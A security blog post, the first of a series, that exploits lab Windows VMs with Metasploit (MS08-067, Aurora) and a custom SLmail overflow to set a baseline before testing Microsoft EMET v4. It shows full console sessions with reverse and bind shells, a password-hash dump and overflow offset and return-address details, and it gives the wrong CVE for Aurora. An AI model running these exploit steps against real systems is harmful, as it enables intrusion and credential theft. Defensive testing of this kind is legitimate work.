– Windows Server 2003 SP2 eng (Host Name: HP-Srv01; IP Address: 192.168.34.135)

Attack machine:
– Linux BackTrack 5R2 (Host Name: bt; IP Address: 192.168.34.132)

Note that both Operating systems and vulnerability are rather old. I use these because I hope that EMET will work well on known exploits, better than with unknown one. So let’s start the phase 1: system without EMETv4.

Test 1
Target: Windows Server 2003 SP2 eng; Host Name: HP-Srv01; IP Address: 192.168.34.135
Vulnerability: CVE-2008-4250 (SMB)
Exploit used: ms08_067_netapi from metasploit

Look at the Metasploit Framework Consolle running on Linux machine:

msf  exploit(ms08_067_netapi) > info

       Name: Microsoft Server Service Relative Path Stack Corruption
     Module: exploit/windows/smb/ms08_067_netapi
    Version: 16002
   Platform: Windows
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Great

Provided by:
  hdm <hdm@metasploit.com>
  Brett Moore <brett.moore@insomniasec.com>
  staylor
  jduck <jduck@metasploit.com>

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  RHOST    192.168.34.135   yes       The target address
  RPORT    445              yes       Set the SMB service port
  SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Payload information:
  Space: 400
  Avoid: 8 characters

Description:
  This module exploits a parsing flaw in the path canonicalization
  code of NetAPI32.dll through the Server Service. This module is
  capable of bypassing NX on some operating systems and service packs.
  The correct target must be used to prevent the Server Service (along
  with a dozen others in the same process) from crashing. Windows XP
  targets seem to handle multiple successful exploitation events, but
  2003 targets will often crash or hang on subsequent attempts. This
  is just the first version of this module, full support for NX bypass
  on 2003, along with other platforms, is still in development.

References:
  https://cvedetails.com/cve/2008-4250/
  https://www.osvdb.org/49243
  https://www.microsoft.com/technet/security/bulletin/MS08-067.mspx
  https://www.rapid7.com/vulndb/lookup/dcerpc-ms-netapi-netpathcanonicalize-dos

msf  exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 192.168.34.132:33899
[*] Automatically detecting the target...
[*] Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] We could not detect the language pack, defaulting to English
[*] Selected Target: Windows 2003 SP2 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 192.168.34.135
[*] Meterpreter session 2 opened (192.168.34.132:33899 -> 192.168.34.135:1089) at 2013-06-18 16:23:06 +0200

meterpreter > shell
Process 3792 created.
Channel 1 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\WINDOWS\system32>systeminfo        
systeminfo

Host Name:                 HP-SRV01
OS Name:                   Microsoft(R) Windows(R) Server 2003, Enterprise Edition
OS Version:                5.2.3790 Service Pack 2 Build 3790
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Primary Domain Controller
OS Build Type:             Uniprocessor Free
Registered Owner:          hp
Registered Organization:   hp
Product ID:                69713-650-3699384-45501
Original Install Date:     1/20/2013, 12:26:37 AM
System Up Time:            0 Days, 0 Hours, 6 Minutes, 5 Seconds
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               X86-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: x86 Family 6 Model 37 Stepping 5 GenuineIntel ~3466 Mhz
BIOS Version:              INTEL  - 6040000
Windows Directory:         C:\WINDOWS
System Directory:          C:\WINDOWS\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (GMT+01:00) Amsterdam, Berlin, Bern, Rome, Stockholm, Vienna
Total Physical Memory:     511 MB
Available Physical Memory: 305 MB
Page File: Max Size:       1,044 MB
Page File: Available:      844 MB
Page File: In Use:         200 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    hp.local
Logon Server:              N/A
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: Q147222
                           [02]: SP1 - SP
                           [03]: KB914961 - Service Pack
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    Yes
                                 DHCP Server:     192.168.34.254
                                 IP address(es)
                                 [01]: 192.168.34.135

C:\WINDOWS\system32>

Test 1 succesfull

Test 2
Target: Windows XP SP3 eng; Host Name: HP-CLI01; IP Address: 192.168.34.134
Vulnerability: CVE-2008-4250 (IE6)
Exploit used: ms10_002_aurora from metasploit

On the Linux machine I start a http server with evil page (https://192.168.34.132:8080/evil) using Metasploit:

Module options (exploit/windows/browser/ms10_002_aurora):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   SRVHOST     0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT     8080             yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
   SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH     /evil            no        The URI to use for this exploit (default is random)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process, none
   LHOST     192.168.34.132   yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf  exploit(ms10_002_aurora) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.34.132:4444
[*] Using URL: https://0.0.0.0:8080/evil
[*]  Local IP: https://192.168.34.132:8080/evil
msf  exploit(ms10_002_aurora) > [*] Server started.
...
...

Now in the target machine I start Internet Explorer 6, browse to the evil page and the msf consolle continues:

...
...
[*] 192.168.34.134   ms10_002_aurora - Sending Internet Explorer "Aurora" Memory Corruption
[*] Sending stage (752128 bytes) to 192.168.34.134
[*] Meterpreter session 1 opened (192.168.34.132:4444 -> 192.168.34.134:1145) at 2013-06-18 17:00:56 +0200

msf  exploit(ms10_002_aurora) > sessions

Active sessions
===============

  Id  Type                   Information               Connection
  --  ----                   -----------               ----------
  1   meterpreter x86/win32  HP-CLI01\user @ HP-CLI01  192.168.34.132:4444 -> 192.168.34.134:1145 (192.168.34.134)

msf  exploit(ms10_002_aurora) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : HP-CLI01
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > hashdump
Administrator:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:5d193c1fc3224fbbbc410375cbf57593:cb30aaad8dc109ef9521bfa868237ee3:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:9fc1f511ad19c511fd4e162ca71fd236:::
user:1003:22124ea690b83bfbaad3b435b51404ee:57d583aa46d571502aad4bb7aea09c70:::

meterpreter > shell
Process 220 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\user\Desktop>systeminfo
systeminfo

Host Name:                 HP-CLI01
OS Name:                   Microsoft Windows XP Professional
OS Version:                5.1.2600 Service Pack 3 Build 2600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Uniprocessor Free
Registered Owner:          honeypot
Registered Organization:   honeypot
Product ID:                76487-640-1479176-23404
Original Install Date:     1/23/2013, 11:06:09 AM
System Up Time:            0 Days, 0 Hours, 9 Minutes, 4 Seconds
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System type:               X86-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: x86 Family 6 Model 37 Stepping 5 GenuineIntel ~3465 Mhz
BIOS Version:              INTEL  - 6040000
Windows Directory:         C:\WINDOWS
System Directory:          C:\WINDOWS\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (GMT-08:00) Pacific Time (US & Canada); Tijuana
Total Physical Memory:     511 MB
Available Physical Memory: 38 MB
Virtual Memory: Max Size:  2,048 MB
Virtual Memory: Available: 2,008 MB
Virtual Memory: In Use:    40 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    WORKGROUP
Logon Server:              \\HP-CLI01
Hotfix(s):                 5 Hotfix(s) Installed.
                           [01]: File 1
                           [02]: File 1
                           [03]: Q147222
                           [04]: KB942288-v3 - Update
                           [05]: KB954550-v5 - Update
NetWork Card(s):           1 NIC(s) Installed.
                           [01]: VMware Accelerated AMD PCNet Adapter
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    Yes
                                 DHCP Server:     192.168.34.254
                                 IP address(es)
                                 [01]: 192.168.34.134

C:\Documents and Settings\user\Desktop>

Test 2 succesfull

Test 3
Target: Windows XP SP3 eng; Host Name: HP-CLI01; IP Address: 192.168.34.134
Vulnerability: CVE-2003-0264 (slmail55_4433)
Exploit used: my version of this well known exploit

Take a look at the target machine:

C:\Documents and Settings\user>ipconfig | findstr Address
        IP Address. . . . . . . . . . . . : 192.168.34.134

C:\Documents and Settings\user>hostname
hp-cli01

C:\Documents and Settings\user>netstat /na | findstr LISTENING
  TCP    0.0.0.0:25             0.0.0.0:0              LISTENING
  TCP    0.0.0.0:79             0.0.0.0:0              LISTENING
  TCP    0.0.0.0:106            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:110            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:180            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:1034           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING
  TCP    127.0.0.1:1028         0.0.0.0:0              LISTENING
  TCP    127.0.0.1:8376         0.0.0.0:0              LISTENING
  TCP    192.168.34.134:139     0.0.0.0:0              LISTENING

Now, let’s run the exploit from the attacker machine and re-run netstat

C:\Documents and Settings\user>netstat /na | findstr LISTENING
  TCP    0.0.0.0:25             0.0.0.0:0              LISTENING
  TCP    0.0.0.0:79             0.0.0.0:0              LISTENING
  TCP    0.0.0.0:106            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:110            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:180            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:1034           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:4444           0.0.0.0:0              LISTENING
  TCP    127.0.0.1:1028         0.0.0.0:0              LISTENING
  TCP    127.0.0.1:8376         0.0.0.0:0              LISTENING
  TCP    192.168.34.134:139     0.0.0.0:0              LISTENING

The payload of the exploit was a bind shell on port 4444, indeed a TCP listener is now working this port.
On the Linux machine I am able to connect to this listener a get a remore shell:

root@bt:~# nc -v 192.168.34.134 4444
192.168.34.134: inverse host lookup failed: Unknown server error : Connection timed out
(UNKNOWN) [192.168.34.134] 4444 (?) open
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Program Files\SLmail\System>systeminfo
systeminfo

Host Name:                 HP-CLI01
OS Name:                   Microsoft Windows XP Professional
OS Version:                5.1.2600 Service Pack 3 Build 2600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Uniprocessor Free
Registered Owner:          honeypot
Registered Organization:   honeypot
Product ID:                76487-640-1479176-23404
Original Install Date:     1/23/2013, 11:06:09 AM
System Up Time:            0 Days, 0 Hours, 32 Minutes, 0 Seconds
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System type:               X86-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: x86 Family 6 Model 37 Stepping 5 GenuineIntel ~3466 Mhz
BIOS Version:              INTEL  - 6040000
Windows Directory:         C:\WINDOWS
System Directory:          C:\WINDOWS\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (GMT-08:00) Pacific Time (US & Canada); Tijuana
Total Physical Memory:     511 MB
Available Physical Memory: 299 MB
Virtual Memory: Max Size:  2,048 MB
Virtual Memory: Available: 2,008 MB
Virtual Memory: In Use:    40 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    WORKGROUP
Logon Server:              N/A
Hotfix(s):                 5 Hotfix(s) Installed.
                           [01]: File 1
                           [02]: File 1
                           [03]: Q147222
                           [04]: KB942288-v3 - Update
                           [05]: KB954550-v5 - Update
NetWork Card(s):           1 NIC(s) Installed.
                           [01]: VMware Accelerated AMD PCNet Adapter
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    Yes
                                 DHCP Server:     192.168.34.254
                                 IP address(es)
                                 [01]: 192.168.34.134

C:\Program Files\SLmail\System>

The following screenshot is the exploit in acrion:

Image 1

Image 1


Let’s go back of some steps and debug the exploit and look at image 2.
Image 2

Image 2


The EIP is overwritten after 4654 bytes of space (\x41 ASCII A) and, in the 4 bytes of the EIP (\x42 ASCII B), I will put the return address ‘\x53\x93\x42\x7E’ that will point to exact space address of user32.dll. This will surelly work only under the same OS version (every Windows XP sp3 eng); that is where the user32.dll version and address space is the same.
If I understend how EMET works, it will often change the spece address of user32.dll de facto invalidating the exploit. Or better causing the application crash.

[end of phase 1] Take a look at the [phase 2]

]]>
https://www.gosecure.it/blog/art/132/sec/emetv4-part-1/feed/ 0